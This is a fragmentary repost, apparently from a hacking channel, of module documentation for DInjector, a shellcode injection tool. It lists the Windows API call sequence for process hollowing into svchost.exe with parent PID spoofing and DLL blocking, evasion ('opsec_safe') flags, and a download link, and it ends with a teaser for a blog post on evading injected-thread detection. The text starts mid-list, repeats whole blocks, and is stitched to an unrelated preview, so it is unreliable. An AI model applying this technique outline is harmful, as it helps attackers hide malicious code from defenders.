5: 'NtProtectVirtualMemory (oldProtect)'
6: 'NtResumeThread'
opsec_safe: false
references:
- 'https://github.com/CCob/SharpBlock/blob/master/Program.cs' Credits @TheWover and @FuzzySecurity for their awesome DInvoke (https://github.com/TheWover/DInvoke) project. All those great researchers mentioned in the modules references above.
Download DInjector (https://github.com/snovvcrash/DInjector)
___________________________
@hacking_Attack
@Hacking_Video
6: 'SetThreadContext'
7: 'NtResumeThread'
opsec_safe: true
references:
- 'https://blog.xpnsec.com/undersanding-and-evading-get-injectedthread/'
- 'https://github.com/djhohnstein/CSharpSetThreadContext/blob/master/Runner/Program.cs' ProcessHollow (https://github.com/snovvcrash/DInjector/blob/main/DInjector/Modules/ProcessHollow.cs) module_name: 'processhollow'
arguments: |
/image:C:\Windows\System32\svchost.exe /ppid:31337 /blockDlls:True
description: |
Injects shellcode into a newly spawned remote process.
Thread execution via NtResumeThread (hollowing with shellcode).
calls:
- kernel32.dll:
1: 'InitializeProcThreadAttributeList'
2: 'UpdateProcThreadAttribute (blockDLLs)'
3: 'UpdateProcThreadAttribute (PPID)'
4: 'CreateProcessA'
- ntdll.dll:
1: 'NtQueryInformationProcess'
2: 'NtReadVirtualMemory'
3: 'NtProtectVirtualMemory (PAGE_EXECUTE_READWRITE)'
4: 'NtWriteVirtualMemory'
5: 'NtProtectVirtualMemory (oldProtect)'
6: 'NtResumeThread'
opsec_safe: false
references:
- 'https://github.com/CCob/SharpBlock/blob/master/Program.cs' Credits @TheWover and @FuzzySecurity for their awesome DInvoke (https://github.com/TheWover/DInvoke) project. All those great researchers mentioned in the modules references above.
Download DInjector (https://github.com/snovvcrash/DInjector)
___________________________
@hacking_Attack
@Hacking_Video
XPN Infosec Blog
@_xpn_ - Understanding and Evading Get-InjectedThread
One of the many areas of this field that I really enjoy is the "cat and mouse" game played between RedTeam and BlueTeam, each forcing the other to up their game. Often we see some awesome tools being released to help defenders detect malware or shellcode…